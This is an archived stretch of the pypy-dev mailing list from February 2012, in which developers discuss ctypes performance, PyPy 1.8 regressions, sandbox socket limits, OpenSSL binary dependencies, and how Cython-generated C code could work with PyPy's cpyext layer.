From: fijall at gmail.com (Maciej Fijalkowski)
Date: Mon, 13 Feb 2012 20:44:07 +0200
Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5
In-Reply-To:
References:
Message-ID:

On Mon, Feb 13, 2012 at 4:29 PM, Stefan Behnel wrote:
> Sébastien Volle, 13.02.2012 13:33:
>> My team is working on a project of fast packet sniffers and I'm comparing
>> performance between different languages.
>> So, we came up with a simple ARP sniffer that I ported to Python using
>> ctypes.
>
> If performance is important to you, you may want to write the wrapper for
> Python in Cython instead (and maybe also parts of the filtering code, which
> I assume your program to be about).
>
> Stefan

Hi Stefan

I appreciate your willingness to advertise cython wherever possible, but this is simply not on topic in the current thread. Cython is not a panacea for all woes and it's actually slower than pypy in most cases that don't involve calling C. It's also slower even when you provide direct type annotations, so you have a pretty reasonable use case for pypy even in cases where calling C is a problem. Also, we're going to attack those ctypes problems.

If you wish to respond to my mail, please put it into a post that has a different title and not hijack all the discussions with cython.

Thank you,
fijal

From laurentvaucher at gmail.com  Mon Feb 13 19:50:41 2012
From: laurentvaucher at gmail.com (Laurent Vaucher)
Date: Mon, 13 Feb 2012 19:50:41 +0100
Subject: [pypy-dev] PyPy 1.8 50% slower than PyPy 1.7 on my test case
Message-ID:

Hi and first of all, thanks for that great project.

Now to my "problem". I'm doing some puzzle-solving, constraint processing with Python, and on my particular program, PyPy 1.8 showed a 50% increase in running time over PyPy 1.7.
I'm not doing anything fancy (no numpy, itertools, etc.). The program is here: https://github.com/slowfrog/hexiom To reproduce: - fetch hexiom2.py and level36.txt from github - run 'pypy hexiom2.py -sfirst level36.txt' On my machine (Windows 7) the timings are the following: Python 2.6.5/Windows 32 3m35s Python 2.7.1 (930f0bc4125a, Nov 27 2011, 11:58:57) [PyPy 1.7.0 with MSC v.1500 32 bit] 31s Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 18:31:47) [PyPy 1.8.0 with MSC v.1500 32 bit] 48s I'm using the default options. Do you have any idea what could be causing that? Thanks, Laurent. -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Mon Feb 13 19:59:48 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 13 Feb 2012 20:59:48 +0200 Subject: [pypy-dev] Socket module fails in pypy1.8 In-Reply-To: References: Message-ID: On Mon, Feb 13, 2012 at 7:38 PM, kracekumar ramaraju wrote: > Hi > > kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ > pypy1.7 pypy_interact.py --tmp=virtualtmp/ ../../../pypy-c > ['/bin/pypy-c'] > Warning: cannot find your CPU L2 cache size in /proc/cpuinfo > Not Implemented: SomeString(no_nul=True) > RuntimeError > 'import site' failed > Python 2.7.2 (2346207d99463f299f09f3e151c9d5fa9158f71b, Feb 11 2012, > 23:26:49) > [PyPy 1.8.0 with GCC 4.6.1] on linux2 > Type "help", "copyright", "credits" or "license" for more information. > And now for something completely different: ``PyPy is not a real VM: no > segfault handlers to do the rare cases'' >>>>> import socket > Traceback (most recent call last): > File "", line 1, in > File "/bin/lib-python/modified-2.7/socket.py", line 47, in > import _socket > ImportError: No module named _socket >>>>> > > It seems _socket module is undefined, I checked in lib-python/modified-2.7 and could not locate _socket module.
> > -- > Thanks & Regards > > "Talk is cheap, show me the code" -- Linus Torvalds > kracekumar > www.kracekumar.com > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > Sandboxed version does not support sockets. From stefan_ml at behnel.de Mon Feb 13 20:37:13 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Mon, 13 Feb 2012 20:37:13 +0100 Subject: [pypy-dev] offtopic, ontopic, ... (was: ctypes - PyPy 1.8 slower than Python 2.6.5) In-Reply-To: References: Message-ID: Maciej Fijalkowski, 13.02.2012 19:44: > On Mon, Feb 13, 2012 at 4:29 PM, Stefan Behnel wrote: >> Sébastien Volle, 13.02.2012 13:33: >>> My team is working on a project of fast packet sniffers and I'm comparing >>> performance between different languages. >>> So, we came up with a simple ARP sniffer that I ported to Python using >>> ctypes. >> >> If performance is important to you, you may want to write the wrapper for >> Python in Cython instead (and maybe also parts of the filtering code, which >> I assume your program to be about). > > I appreciate your willingness to advertise cython wherever it's > possible, but this is simply not on topic on the current thread. Sébastien Volle replied to my mail telling me that their current approach was actually based on LuaJIT and its native FFI, and that he was mostly comparing that to other languages (which all lose thoroughly in the competition, BTW). That makes Cython on-topic for him at least. I also find Cython generally *very* on-topic when the intention is to interface Python code with C code, especially when performance and/or ease of use are part of the requirements. In terms of features and comfort, ctypes is still a bit too far behind the user experience that Cython has to offer. Given how important Cython has become for the Python ecosystem in many regards, it's sad that PyPy still doesn't have it available.
From what I hear, that's a serious blocker to some users. (Or should I say "most users"?) > Cython is not a panacea for all woes Well, what is? > and it's actually slower than > pypy on most cases that don't involve calling C. It's also slower even > when you provide direct type annotations Ah, "most cases", hm? How is that for a well founded statement? What are you using for comparison? speed.pypy.org? Have you noticed that amongst all those benchmarks there that PyPy was specifically tuned for, there is not a single benchmark that was selected specifically for Cython? There are always lies, damn lies and then there are benchmarks, don't forget that. > so you have a pretty > reasonable usecase for pypy even in cases where calling C is a > problem. Also, we're going to attack those ctypes problems. Since when is "we can do that, too" synonymous with "there are no alternatives"? World domination seems an attractive goal to go after, but it's pretty boring in the long run. Besides, "going to attack" admits that you're not there yet. Cython has been there for a couple of years now, it solves real problems that real users have today, and it's constantly getting better in doing so, because it's being designed and developed to solve those problems. It may not be obvious to you, but PyPy isn't a panacea either. > If you wish to respond to my mail, please put it into a post that has > a different title and not hijack all the discussions with cython. Ok, done. BTW, what are those show-off mails meant for that you keep sending to python-dev on each PyPy release? Do you really consider them on-topic for the development of the CPython runtime, or even just the Python language? Food for thought ... Stefan From faassen at startifact.com Mon Feb 13 21:16:42 2012 From: faassen at startifact.com (Martijn Faassen) Date: Mon, 13 Feb 2012 21:16:42 +0100 Subject: [pypy-dev] offtopic, ontopic, ... 
(was: ctypes - PyPy 1.8 slower than Python 2.6.5) In-Reply-To: References: Message-ID: Hi Stefan, others, I've recommended to Maciej to take this discussion off-list with Stefan. I think a few mailing list etiquette mistakes were made in this discussion so far. I don't think this is worth a flame war and it's in my interest if you both work it out - Stefan's contributions added to Maciej's might make PyPy even better in the long run. Thanks, Martijn From fijall at gmail.com Mon Feb 13 21:41:27 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 13 Feb 2012 22:41:27 +0200 Subject: [pypy-dev] offtopic, ontopic, ... (was: ctypes - PyPy 1.8 slower than Python 2.6.5) In-Reply-To: References: Message-ID: On Mon, Feb 13, 2012 at 9:37 PM, Stefan Behnel wrote: > Maciej Fijalkowski, 13.02.2012 19:44: >> On Mon, Feb 13, 2012 at 4:29 PM, Stefan Behnel wrote: >>> Sébastien Volle, 13.02.2012 13:33: >>>> My team is working on a project of fast packet sniffers and I'm comparing >>>> performance between different languages. >>>> So, we came up with a simple ARP sniffer that I ported to Python using >>>> ctypes. >>> >>> If performance is important to you, you may want to write the wrapper for >>> Python in Cython instead (and maybe also parts of the filtering code, which >>> I assume your program to be about). >> >> I appreciate your willingness to advertise cython wherever it's >> possible, but this is simply not on topic on the current thread. > > Sébastien Volle replied to my mail telling me that their current approach > was actually based on LuaJIT and its native FFI, and that he was mostly > comparing that to other languages (which all lose thoroughly in the > competition, BTW). That makes Cython on-topic for him at least. > > I also find Cython generally *very* on-topic when the intention is to > interface Python code with C code, especially when performance and/or ease > of use are part of the requirements.
In terms of features and comfort, > ctypes is still a bit too far behind the user experience that Cython has to > offer. Given how important Cython has become for the Python ecosystem in > many regards, it's sad that PyPy still doesn't have it available. From what > I hear, that's a serious blocker to some users. (Or should I say "most users"?) Fair point actually. And I agree about all points about ctypes. > > >> Cython is not a panacea for all woes > > Well, what is? > > >> and it's actually slower than >> pypy on most cases that don't involve calling C. It's also slower even >> when you provide direct type annotations > > Ah, "most cases", hm? How is that for a well founded statement? What are > you using for comparison? speed.pypy.org? Have you noticed that amongst all > those benchmarks there that PyPy was specifically tuned for, there is not a > single benchmark that was selected specifically for Cython? There are > always lies, damn lies and then there are benchmarks, don't forget that. Well, those benchmarks were not really selected for pypy. There is a very limited set of available interesting python benchmarks and we made the selection rather on "what is slow" rather than "what is fast", if any sort of pypy-related things were considered, barring the obvious "does it run on PyPy". > > >> so you have a pretty >> reasonable usecase for pypy even in cases where calling C is a >> problem. Also, we're going to attack those ctypes problems. > > Since when is "we can do that, too" synonymous with "there are no > alternatives"? World domination seems an attractive goal to go after, but > it's pretty boring in the long run. > > Besides, "going to attack" admits that you're not there yet. Cython has > been there for a couple of years now, it solves real problems that real > users have today, and it's constantly getting better in doing so, because > it's being designed and developed to solve those problems. 
> > It may not be obvious to you, but PyPy isn't a panacea either. > Right. I agree that cython offers a much better experience than ctypes. > >> If you wish to respond to my mail, please put it into a post that has >> a different title and not hijack all the discussions with cython. > > Ok, done. BTW, what are those show-off mails meant for that you keep > sending to python-dev on each PyPy release? Do you really consider them > on-topic for the development of the CPython runtime, or even just the > Python language? Food for thought ... Hm. I dunno, that might be really a mistake on our side. I'll probably stick with python announce then. PS. Sorry for the tone of my original email, it was a bit unprofessional. Cheers, fijal From amauryfa at gmail.com Mon Feb 13 22:06:45 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Mon, 13 Feb 2012 22:06:45 +0100 Subject: [pypy-dev] offtopic, ontopic, ... (was: ctypes - PyPy 1.8 slower than Python 2.6.5) In-Reply-To: References: Message-ID: 2012/2/13 Stefan Behnel > Given how important Cython has become for the Python ecosystem in > many regards, it's sad that PyPy still doesn't have it available > Last time I looked, Cython still generates code that PyPy cannot handle: for example, it explicitly messes with tstate->curexc_type &co, Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Mon Feb 13 22:54:00 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Mon, 13 Feb 2012 22:54:00 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: Message-ID: Maciej Fijalkowski, 13.02.2012 21:41: > On Mon, Feb 13, 2012 at 9:37 PM, Stefan Behnel wrote: >> What are >> you using for comparison? speed.pypy.org? 
Have you noticed that amongst all >> those benchmarks there that PyPy was specifically tuned for, there is not a >> single benchmark that was selected specifically for Cython? There are >> always lies, damn lies and then there are benchmarks, don't forget that. > > Well, those benchmarks were not really selected for pypy. There is a > very limited set of available interesting python benchmarks and we > made the selection rather on "what is slow" rather than "what is > fast", if any sort of pypy-related things were considered, barring the > obvious "does it run on PyPy". Mind my wording. The thing is that the PyPy devs used these benchmarks to tune PyPy, i.e. they became the exact set of software that PyPy is particularly fast for. That makes them less interesting benchmarks for others and reduces their value for comparison, unless a similar amount of continuous effort (years, I presume) is spent in other projects to tune their tools for the exact same set (or even just a subset) of this software. I'm not trying to suggest that the choice of benchmarks is bad in any way or that they are not representing real-world requirements, not at all. But PyPy has a special advantage in running exactly this benchmark suite. To make this clear (and I don't think this is just my personal point of view), it is not the intention of the Cython project to run the specific, unmodified (or even partly or fully statically typed) software in this benchmark suite anywhere near as fast as PyPy, simply because we are focussing on other ways of tuning and rewriting code than would be required for running these benchmarks the way they are. It's not only because we can't, it's because it would be a useless waste of programmer resources to even try. It's the kind of software that PyPy was (and is being) designed and tuned to run, and it saves us a lot of effort to just let it do that. > I agree that cython offers a much better experience than ctypes. Phew, I'm happy you say that. :) > PS. 
Sorry for the tone of my original email, it was a bit unprofessional. Same here. Happens to all of us. Thanks, Martijn, for hooking in just-in-time (which finally gets us back on topic for this list). Stefan From faassen at startifact.com Mon Feb 13 22:57:52 2012 From: faassen at startifact.com (Martijn Faassen) Date: Mon, 13 Feb 2012 22:57:52 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: Message-ID: Hey, Thanks guys for bringing the discussion back on track! Regards, Martijn From stefan_ml at behnel.de Mon Feb 13 23:26:53 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Mon, 13 Feb 2012 23:26:53 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 13.02.2012 22:06: > 2012/2/13 Stefan Behnel > >> Given how important Cython has become for the Python ecosystem in >> many regards, it's sad that PyPy still doesn't have it available > > Last time I looked, Cython still generates code that PyPy cannot handle: > for example, it explicitly messes with tstate->curexc_type &co, > Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? Just two general comments on this, because these internals are really off-topic for this list and much better suited for the cython-dev list. 1) These things are usually done for two reasons: sometimes for better performance (inlining!), but also because there are cases where CPython fails to match its own Python-level semantics at the C-API level (simply because no-one else but Cython actually needs them there). So we sometimes end up rewriting parts of its C-API in a way that allows us to reimplement the correct Python semantics on top of them. Also note that Python 2 and 3 behave severely different in some corners, but Cython must be able to support both behaviours regardless of which of the two C-APIs the C compiler finds at compile time. Exception handling is a particularly shining example, I can tell. 
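[Editorial note: the save/restore contract Amaury alludes to above — PyErr_Fetch() moving the pending exception out of the thread state and clearing it, PyErr_Restore() putting it back — can be modelled in a few lines of plain C. Everything here (ts_* fields, fetch_exc, restore_exc) is an illustrative stand-in, not the real CPython API; the real functions operate on the three PyObject* slots of the thread state and transfer reference ownership to or from the caller.]

```c
#include <stddef.h>

/* Toy model of the exception state held in a thread state.
 * ts_type/ts_value/ts_traceback stand in for tstate->curexc_*. */
static void *ts_type, *ts_value, *ts_traceback;

/* Model of PyErr_Fetch(): move the pending exception out of the
 * thread state into the caller's hands and clear the state. */
static void fetch_exc(void **type, void **value, void **tb) {
    *type = ts_type;
    *value = ts_value;
    *tb = ts_traceback;
    ts_type = ts_value = ts_traceback = NULL;  /* state is now clear */
}

/* Model of PyErr_Restore(): put a previously fetched exception back. */
static void restore_exc(void *type, void *value, void *tb) {
    ts_type = type;
    ts_value = value;
    ts_traceback = tb;
}
```

Going through such a pair, rather than poking the fields directly, is exactly what would let an alternative runtime supply its own definitions.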
2) Given that PyPy has proper Python semantics built-in, it would be much better to reuse those and sort-of add Cython semantics to them in some way, than to try to interface with PyPy at the bare C-API level. However, note that Cython's type system is really complex. That's basically all the Cython language adds over Python: a bunch of types and a huge set of pretty smart rules to fit them together. That makes a true Cython-backend for PyPy a much more ambitious longer-term goal than a set of "quick and dirty but doesn't always work" kind of C-API hacks to improve the connection between the two. Personally, I think both are worth exploring. Stefan From dhubler at u.washington.edu Mon Feb 13 23:42:16 2012 From: dhubler at u.washington.edu (Dale Hubler) Date: Mon, 13 Feb 2012 14:42:16 -0800 Subject: [pypy-dev] question re: ancient SSL requirement of pypy Message-ID: <4F3991C8.5040305@u.washington.edu> Hello, I was requested to install pypy but our computers appear to be too new to run it, having libssl.so.0.9.8e among other newer items. This confuses me because the web page for pypy shows a 2011 date and blog entries from 2012. Can 2005 SSL really be a requirement, I am unable to install such an old item on a cluster where this software might be used. I looked at the pypy site but cannot find any supported platforms, install guide, etc. I am trying this on RedHat EL 5. I tried the binary release, but it also had the same error, no libssl.so.0.9.8, which is true, my systems are updated. I must be missing something. Do you have any links or other on-line info explaining how to build pypy. thanks, Dale -- Dale Hubler dhubler at uw.edu (206) 685-4035 Senior Computer Specialist University of Washington Genome Sciences Dept. From anto.cuni at gmail.com Tue Feb 14 00:04:40 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 00:04:40 +0100 Subject: [pypy-dev] offtopic, ontopic, ... 
In-Reply-To: References: Message-ID: <4F399708.2070608@gmail.com> On 02/13/2012 11:26 PM, Stefan Behnel wrote: >> > Last time I looked, Cython still generates code that PyPy cannot handle: >> > for example, it explicitly messes with tstate->curexc_type&co, >> > Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? > Just two general comments on this, because these internals are really > off-topic for this list and much better suited for the cython-dev list. > > 1) These things are usually done for two reasons: sometimes for better > performance (inlining!), but also because there are cases where CPython > fails to match its own Python-level semantics at the C-API level (simply > because no-one else but Cython actually needs them there). So we sometimes > end up rewriting parts of its C-API in a way that allows us to reimplement > the correct Python semantics on top of them. what about wrapping these "cython hacks" into some macros (which would be defined only when compiling against CPython)? This way, they would still have the same semantic/performance when compiling for CPython, but that would still allow PyPy to implement them. Basically, I'm proposing to unofficially extend a bit the C API so that PyPy and Cython can meet. I agree that in the long run this is probably not the best solution, however it might be interesting in the short run. ciao, anto From anto.cuni at gmail.com Tue Feb 14 00:12:47 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 00:12:47 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: <4F390C5E.4060802@gmail.com> Message-ID: <4F3998EF.1020407@gmail.com> On 02/13/2012 03:22 PM, Sébastien Volle wrote: > Thank you for your help Antonio. It seems a little indentation problem in the > modified arp.py file you attached makes the main() loop return after a > single packet. I attached the updated version.
Oops, I should have taken more care: actually, I was a bit surprised to see such a huge improvement, but didn't check more. This is what happens when you don't have tests to run ;-) > The actual new figures are: > CPython: ~580ms (~310ms with initial version) > PyPy: ~1120ms (~1300ms with initial version) > > So, the manual cast of array to c_void_p makes the program around 2x slower on > CPython, and only marginally faster on PyPy. PyPy now spends most of its time in > pointer.py:_cast_addr(). uhm, indeed, then my suggestion doesn't work very well. I suppose that I should just add support for arrays to the fast path. ciao, Anto From markflorisson88 at gmail.com Tue Feb 14 00:59:05 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Mon, 13 Feb 2012 23:59:05 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F399708.2070608@gmail.com> References: <4F399708.2070608@gmail.com> Message-ID: On 13 February 2012 23:04, Antonio Cuni wrote: > On 02/13/2012 11:26 PM, Stefan Behnel wrote: >>> >>> > ?Last time I looked, Cython still generates code that PyPy cannot >>> > handle: >>> > ?for example, it explicitly messes with tstate->curexc_type&co, >>> > ?Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? >> >> Just two general comments on this, because these internals are really >> off-topic for this list and much better suited for the cython-dev list. >> >> 1) These things are usually done for two reasons: sometimes for better >> performance (inlining!), but also because there are cases where CPython >> fails to match its own Python-level semantics at the C-API level (simply >> because no-one else but Cython actually needs them there). So we sometimes >> end up rewriting parts of its C-API in a way that allows us to reimplement >> the correct Python semantics on top of them. > > > what about wrapping these "cython hacks" into some macros (which would be > defined only when compiling against CPython)?
This way, they would still > have the same semantic/performance when compiling for CPython, but that > would still allow PyPy to implement them. > > Basically, I'm proposing to unofficially extend a bit the C API so that PyPy > and Cython can meet. I agree that in the long run this is probably not the > best solution, however it might be interesting in the short run. That would be neat, interfacing at the C level is much easier than at a Python + ctypes level in many ways for Cython. Forgive my ignorance, but is there a complete-ish overview of which parts of the CPython C API are available? Perhaps the generated C code can also appease the GC in some way instead of refcounting the objects? As a further point of interest, is there any support for the buffer interface (PEP 3118)? On a side note, me and Dag Sverre will be at PyCon this year to attend the main conference and to do some sprinting on Cython. Perhaps we could draw up a concrete proposal that could make pypy and Cython work together. > ciao, > anto > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From bokr at oz.net Tue Feb 14 04:02:11 2012 From: bokr at oz.net (Bengt Richter) Date: Mon, 13 Feb 2012 19:02:11 -0800 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F3991C8.5040305@u.washington.edu> References: <4F3991C8.5040305@u.washington.edu> Message-ID: <4F39CEB3.8070607@oz.net> On 02/13/2012 02:42 PM Dale Hubler wrote: > Hello, > > I was requested to install pypy but our computers appear to be too new > to run it, having libssl.so.0.9.8e among other newer items. This > confuses me because the web page for pypy shows a 2011 date and blog > entries from 2012. Can 2005 SSL really be a requirement, I am unable > to install such an old item on a cluster where this software might be used.
> > I looked at the pypy site but cannot find any supported platforms, > install guide, etc. I am trying this on RedHat EL 5. I tried the > binary release, but it also had the same error, no libssl.so.0.9.8, > which is true, my systems are updated. I must be missing something. > Do you have any links or other on-line info explaining how to build pypy. > > thanks, > Dale > FWIW, I've been wondering what this difference means re SSL: __________________________________________ [18:57 ~/wk/llac/bin]$ grep -i openssl <(strings $(which pypy)) OpenSSL_add_all_digests OPENSSL_0.9.8 OPENSSL_VERSION openssl_sha224 openssl_sha512 openssl_sha384 openssl_sha1] OPENSSL_VERSION_INFO] OPENSSL_VERSION_NUMBER openssl_sha256 openssl_md5 OpenSSL 0.9.8k 25 Mar 2009 Returns 1 if the OpenSSL PRNG has been seeded with enough data and 0 if not. Mix string into the OpenSSL PRNG state. entropy (a float) is a lower [18:58 ~/wk/llac/bin]$ grep -i openssl <(strings $(which python)) [18:58 ~/wk/llac/bin]$ __________________________________________ (i.e., openssl doesn't appear in python, but does in pypy. Linked differently?) Regards, Bengt Richter From mail at justinbogner.com Tue Feb 14 07:43:29 2012 From: mail at justinbogner.com (Justin Bogner) Date: Mon, 13 Feb 2012 23:43:29 -0700 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F3991C8.5040305@u.washington.edu> (Dale Hubler's message of "Mon, 13 Feb 2012 14:42:16 -0800") References: <4F3991C8.5040305@u.washington.edu> Message-ID: <87sjidkj8u.fsf@glimpse.justinbogner.com> Dale Hubler writes: > I looked at the pypy site but cannot find any supported platforms, > install guide, etc. I am trying this on RedHat EL 5. I tried the > binary release, but it also had the same error, no libssl.so.0.9.8, > which is true, my systems are updated. I must be missing something. > Do you have any links or other on-line info explaining how to build > pypy. I think it's just the pre-built binaries that have that dependency. 
ldd shows that the pypy I translated myself links against libssl.so.1.0.0. It is possible to translate pypy with cpython, though it takes something like twice as long as translating with a pre-built pypy. Instructions for translating here: http://doc.pypy.org/en/latest/getting-started-python.html From stefan_ml at behnel.de Tue Feb 14 08:46:56 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 08:46:56 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F399708.2070608@gmail.com> References: <4F399708.2070608@gmail.com> Message-ID: Antonio Cuni, 14.02.2012 00:04: > On 02/13/2012 11:26 PM, Stefan Behnel wrote: >>> > Last time I looked, Cython still generates code that PyPy cannot handle: >>> > for example, it explicitly messes with tstate->curexc_type&co, >>> > Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? >> Just two general comments on this, because these internals are really >> off-topic for this list and much better suited for the cython-dev list. >> >> 1) These things are usually done for two reasons: sometimes for better >> performance (inlining!), but also because there are cases where CPython >> fails to match its own Python-level semantics at the C-API level (simply >> because no-one else but Cython actually needs them there). So we sometimes >> end up rewriting parts of its C-API in a way that allows us to reimplement >> the correct Python semantics on top of them. > > what about wrapping these "cython hacks" into some macros (which would be > defined only when compiling against CPython)? These things (and I would not commonly use the word 'hacks' for them) "never" happen in generated code (and if they do, that should be easy to fix). They only exist in helper functions that we write out into the C module code, sometimes with template replacements, but most of the time just as they were written. 
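[Editorial note: the macro dispatch Antonio asks about above can be sketched in self-contained C. The CY_SAVE_EXC name, both stub implementations, and using PYPY_VERSION as the preprocessor guard are all illustrative assumptions, not actual Cython output — the point is only that generated code uses one macro name while the preprocessor picks the definition per target runtime.]

```c
#include <string.h>

/* Two stand-in implementations of the same operation: a CPython-only
 * shortcut and a version that sticks to the supported API surface.
 * Both are dummies that just report which path was taken. */
static const char *save_exc_inline(void)  { return "inline"; }
static const char *save_exc_via_api(void) { return "api"; }

/* The dispatch: one macro name in the generated code, with the
 * definition chosen at compile time for the target runtime. */
#ifdef PYPY_VERSION
  /* PyPy/cpyext build: go through the supported API call. */
  #define CY_SAVE_EXC() save_exc_via_api()
#else
  /* CPython build: keep the inlined fast path. */
  #define CY_SAVE_EXC() save_exc_inline()
#endif
```

Compiled without PYPY_VERSION defined, CY_SAVE_EXC() takes the inline path; a PyPy-targeted build would only have to supply its own definition of the macro, leaving the generated code untouched.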
It wouldn't be hard at all to generate completely different helper code for a PyPy target, be it by explicitly selecting a different implementation at code generation time, or by making their inner workings depend on a C preprocessor flag (which we tend to do anyway in order to accommodate for C-API changes in CPython). In fact, we might even start telling our utility code management component about alternative implementations, and have it select the right one on the way out, depending on the code target. That would keep the changes to the actual compiler code at a bare minimum, while giving us a huge level of flexibility in the implementation. > This way, they would still > have the same semantic/performance when compiling for CPython, but that > would still allow PyPy to implement them. > > Basically, I'm proposing to unoficially extend a bit the C API so that PyPy > and Cython can meet. I agree that in the long run this is probably not the > best solution, however it might be interesting in the short run. I agree that this would be at least a good thing to start with. I have no idea how to do things like buffer code interfacing or GIL handling yet, but if any PyPy developers attend PyCon-US this year, Dag and Mark will be the perfect people to talk to about that. Stefan From stefan_ml at behnel.de Tue Feb 14 09:17:09 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 09:17:09 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> Message-ID: Stefan Behnel, 14.02.2012 08:46: > Antonio Cuni, 14.02.2012 00:04: >> On 02/13/2012 11:26 PM, Stefan Behnel wrote: >>>>> Last time I looked, Cython still generates code that PyPy cannot handle: >>>>> for example, it explicitly messes with tstate->curexc_type&co, >>>>> Couldn't PyErr_Fetch() and PyErr_Restore() be used instead? 
>>> Just two general comments on this, because these internals are really >>> off-topic for this list and much better suited for the cython-dev list. >>> >>> 1) These things are usually done for two reasons: sometimes for better >>> performance (inlining!), but also because there are cases where CPython >>> fails to match its own Python-level semantics at the C-API level (simply >>> because no-one else but Cython actually needs them there). So we sometimes >>> end up rewriting parts of its C-API in a way that allows us to reimplement >>> the correct Python semantics on top of them. >> >> what about wrapping these "cython hacks" into some macros (which would be >> defined only when compiling against CPython)? > > These things (and I would not commonly use the word 'hacks' for them) > "never" happen in generated code (and if they do, that should be easy to > fix). They only exist in helper functions that we write out into the C > module code, sometimes with template replacements, but most of the time > just as they were written. It wouldn't be hard at all to generate > completely different helper code for a PyPy target, be it by explicitly > selecting a different implementation at code generation time, or by making > their inner workings depend on a C preprocessor flag (which we tend to do > anyway in order to accommodate for C-API changes in CPython). > > In fact, we might even start telling our utility code management component > about alternative implementations, and have it select the right one on the > way out, depending on the code target. That would keep the changes to the > actual compiler code at a bare minimum, while giving us a huge level of > flexibility in the implementation. Thinking about this some more - as long as we can get away with what the C preprocessor gives us, it will make it easier for developers to ship the generated C sources. 
It has always been Cython's philosophy that Cython code should be compiled down to C once and then build on as many platforms as possible without modifications. Stuffing the code for both CPython and PyPy into the same C source file may result in a noticeable increase in C code size at some point, but as long as the C preprocessor can filter it back out, at least the build times won't go up all that much, and it's not like a couple of compressed KBytes more would hurt a PyPI package these days. Stefan From anto.cuni at gmail.com Tue Feb 14 09:35:36 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 09:35:36 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> Message-ID: <4F3A1CD8.4040606@gmail.com> On 02/14/2012 09:17 AM, Stefan Behnel wrote: > > Stuffing the code for both CPython and PyPy into the same C source file may > result in a noticeable increase in C code size at some point, but as long > as the C preprocessor can filter it back out, at least the build times > won't go up all that much, and it's not like a couple of compressed KBytes > more would hurt a PyPI package these days. This is unlikely to happen IMHO, because PyPy does not offer its own C API (yet?). The only C API supported by PyPy is cpyext, which is a (slowish) wrapper compatible with CPython. The only places where the C code needs to be different is where Cython bypasses the C API and directly manipulates the underlying C structures. ciao, Anto From stefan_ml at behnel.de Tue Feb 14 10:30:37 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 10:30:37 +0100 Subject: [pypy-dev] offtopic, ontopic, ...
In-Reply-To: <4F3A1CD8.4040606@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> Message-ID: Antonio Cuni, 14.02.2012 09:35: > On 02/14/2012 09:17 AM, Stefan Behnel wrote: >> >> Stuffing the code for both CPython and PyPy into the same C source file may >> result in a noticeable increase in C code size at some point, but as long >> as the C preprocessor can filter it back out, at least the build times >> won't go up all that much, and it's not like a couple of compressed KBytes >> more would hurt a PyPI package these days. > > This is unlikely to happen IMHO, because PyPy does not offer its own C API > (yet?). The only C API supported by PyPy is cpyext, which is a (slowish) > wrapper compatible with CPython. > > The only places where the C code needs to be different is where Cython > bypasses the C API and directly manipulates the underlying C structures. I agree that this interconnection should grow out of cpyext, but I think we should look out for ways to extend (pun intended) that C-API in order to improve both the efficiency and the semantics. I mean, even Py_INCREF() is wrapped in another macro in Cython that we already replace by code that does ref-counting validation for us at test time. Feel free to let us generate any code you want for that, including special setup and cleanup code at a function boundary or other appropriate places. Higher level functionality could be wrapped in PyPy-specific C-API calls to avoid going through multiple CPython API calls, e.g. a method lookup followed by a call. We could emit hints like "the code is only going to use this object temporarily for iteration", which may allow PyPy to reduce the overhead of providing a C façade for it.
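The Py_INCREF() wrapping that Stefan mentions can be modelled in plain Python; this is only a toy illustration of test-time reference-count validation, not Cython's actual macro layer:

```python
# Toy model of test-time refcount validation: every incref must be
# balanced by a decref.  Illustrative only; the real wrapper expands
# to C macros around Py_INCREF()/Py_DECREF().

_refs = {}

def pyx_incref(obj):
    # Debug build: record the extra reference before taking it.
    _refs[id(obj)] = _refs.get(id(obj), 0) + 1

def pyx_decref(obj):
    # Debug build: complain about a decref that was never increfed.
    count = _refs.get(id(obj), 0)
    assert count > 0, "decref without a matching incref"
    _refs[id(obj)] = count - 1

def check_balanced():
    # Called at a function boundary: no extra references may remain.
    return all(count == 0 for count in _refs.values())

x = object()
pyx_incref(x)
pyx_decref(x)
print(check_balanced())  # → True
```

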